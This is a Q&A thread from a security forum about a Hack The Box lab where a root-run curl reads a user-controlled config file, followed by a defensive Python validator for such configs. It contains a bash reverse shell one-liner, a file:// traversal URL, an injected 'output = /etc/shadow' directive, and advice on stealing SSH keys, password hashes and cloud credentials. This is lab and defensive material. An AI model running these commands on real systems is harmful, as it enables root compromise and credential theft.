1

So I'm doing an HTB challenge where I have leveraged the target box's use of reading a file that sets a URL for curl in order to traverse down the directory and display the root flag in a report that is part of the exercise.

File Content: url = file:///127.0.0.1/../../../root/root.txt

All cool.

What I want to do is further leverage this to somehow spawn a shell by reading /bin/bash. I can read a garbled version of /bin/bash in the report file but I can't figure out how to execute it in a way that will give me an interactive shell.

What can I do in order to achieve this?

EDIT:

I can create a reverse shell from my current user using bash and the below command, I just can't get it to execute as I'd like from 'within' curl.

bash -i >& /dev/tcp/192.168.1.10/8080 0>&1

3therk1ll
  • 149
  • 1
  • 10
  • 1
    So curl is running on the target, and you can control the url it downloads? – davidbaumann Nov 21 '18 at 16:40
  • Yes that's right. It is running as root so I want root to execute something and ideally call back to my listener or alike – 3therk1ll Nov 21 '18 at 16:47
  • Maybe something related to this https://tools.cisco.com/security/center/viewAlert.x?alertId=57918 ? CVE-2018-1000300 – David Magalhães Nov 21 '18 at 16:57
  • It is in the vulnerable version range there. I'll check it out! – 3therk1ll Nov 21 '18 at 17:40
  • Just FYI: there's no need to include a domain name and use path traversal when doing `file://` URIs. A URI like `file:///etc/shadow` is already absolute; its parts are the `file:` scheme, the `//` separator, and the `/etc/shadow` path. – CBHacking Nov 22 '18 at 06:33

3 Answers

2

Depending on how curl is launched, it may be vulnerable to parameter injection. Since you control one parameter already (the URL), you might be able to use characters such as spaces and apostrophes or quotation marks to inject a -o <file parameter, which would cause curl to write its output to that file. If you can do that, there are lots of options (especially since curl runs as root), such as dropping a crontab file with a command to invoke your program in a minute. Less likely to work but still worth checking is whether curl is running within a shell, in which case you may be able to use shell injection (such as backticks or $( ) around a command) to execute an arbitrary command directly.

There is no way for reading a file to directly cause code execution. However, you could try reading files that might be useful for getting remote access to the box. For example, check the SSH authorized keys, and see whether the corresponding private keys are present on the machine; if so, steal them and use them to SSH in (though you might need to break a password on the private key first). You could also try stealing the password hashes from /etc/shadow and cracking them; it's a long shot but maybe there's a weak password on one account that you can guess, and then use to SSH in with password auth. Alternatively, you could try to retrieve any cloud provider credentials (AWS or similar) and use them to gain control of the host through the cloud provider's infrastructure.

CBHacking
  • 40,303
  • 3
  • 74
  • 98
0

In case anybody is interested: the backend script was reading the file containing the URL as a config file and writing as root, so I changed the URL and copied out the /etc/shadow etc. files, created a new user, then read the edited files back to the original locations, to then sudo into that user and get a shell.

I wasn't able to break out of curl itself.

I used the below method to first read the original /etc/shadow file and copy it to a location I could view, then to edit the files with a new user and copy them back.

Curl input file, supplied by the attacker, being read by root:

url = my_ip:port/edited_shadow

I added this below it for the victim machine:

output = /etc/shadow

This is roughly what I used as a guide...

http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

There are of course easier ways to do this, writing a new public key for example. But I wanted to try this method.

3therk1ll
  • 149
  • 1
  • 10
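The two answers above describe the same root cause from two angles: a privileged script hands a user-writable file to curl, either as a config file (where an extra `output =` line redirects the download) or by splicing the URL into a command line (where option or shell injection becomes possible). The following is an added defensive example, not code from the question, the answers, or Hack The Box: a validator that accepts only `url` directives with an http/https scheme and builds an argv list for curl rather than a shell string. The config syntax handled (`key = value`, `key: value`, `key value`, optional quotes) follows curl's documented config-file format; the hosts and paths in the sample inputs are constructed for the example, and the `--proto` and `--` options are used as the author of this example understands them.

```python
"""Added example, not part of the original question or answers.

Defensive check for a privileged script that feeds a user-writable
file to curl. Only `url` directives are accepted, only http/https
schemes are allowed (so file:// reads are refused), and the result is
an argument list rather than a shell command line.
"""
import re
from urllib.parse import urlsplit

ALLOWED_KEYS = {"url"}               # no 'output', 'config', 'proxy', ...
ALLOWED_SCHEMES = {"http", "https"}  # rules out file:// and friends

# curl config lines look like `key = value`, `key: value` or `key value`
LINE_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*)\s*(?:=|:|\s)\s*(.*)$")


class ConfigRejected(ValueError):
    """Raised when the config contains anything outside the allowlist."""


def parse_curl_config(text):
    """Return [(key, value)] for an allowlisted curl config; reject the rest."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = LINE_RE.match(line)
        if not match:
            raise ConfigRejected(f"line {lineno}: unparseable directive")
        key, value = match.group(1).lower(), match.group(2).strip()
        if key not in ALLOWED_KEYS:
            raise ConfigRejected(f"line {lineno}: directive {key!r} not permitted")
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]  # curl allows quoted values
        entries.append((key, value))
    return entries


def validate_url(value):
    """Accept only absolute http(s) URLs with a host; everything else is rejected."""
    parts = urlsplit(value)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ConfigRejected(f"scheme {parts.scheme!r} not permitted")
    if not parts.hostname:
        raise ConfigRejected("URL has no host")
    if any(ch in value for ch in "\r\n\0"):
        raise ConfigRejected("control characters in URL")
    return value


def build_curl_argv(text):
    """Turn a validated config into an argv list: no shell, options fixed by us."""
    urls = [validate_url(v) for k, v in parse_curl_config(text) if k == "url"]
    if len(urls) != 1:
        raise ConfigRejected(f"expected exactly one url, found {len(urls)}")
    # --proto restricts schemes again at the curl level; `--` ends option
    # parsing so the URL can never be interpreted as a flag such as -o.
    return ["curl", "--fail", "--silent", "--max-time", "30",
            "--proto", "=http,https", "--", urls[0]]


def check_config(text):
    """Convenience wrapper returning (accepted?, argv-or-reason)."""
    try:
        return True, build_curl_argv(text)
    except ConfigRejected as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed samples mirroring the thread: a file:// traversal URL,
    # an injected output directive, and a legitimate report URL.
    samples = [
        "url = file:///127.0.0.1/../../../root/root.txt",
        "url = http://192.0.2.10:8000/edited_shadow\noutput = /etc/shadow",
        'url = "https://example.com/report"',
    ]
    for sample in samples:
        print(check_config(sample))
```

The argv list is meant to be passed to `subprocess.run` without `shell=True`; because the privileged side, not the config file, decides every option, an attacker who controls the file can change the destination host at most, never where curl writes or which scheme it uses.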
0

I just completed this box.

You can edit the sudoers file to give sudo permissions to the user. And then sudo your reverse shell command.

schroeder
  • 123,438
  • 55
  • 284
  • 319
lcw
  • 1
  • You are violating the Terms and Conditions of Hack The Box by posting solutions to machines. Please delete your answer - and maybe the question entirely. – Tobi Nary Jan 22 '19 at 09:24
  • 2
    While those T&C may be binding for that user, they are hardly binding for this site, or any other persons. I would consider such a demand extremely rude... – vidarlo Jan 22 '19 at 12:14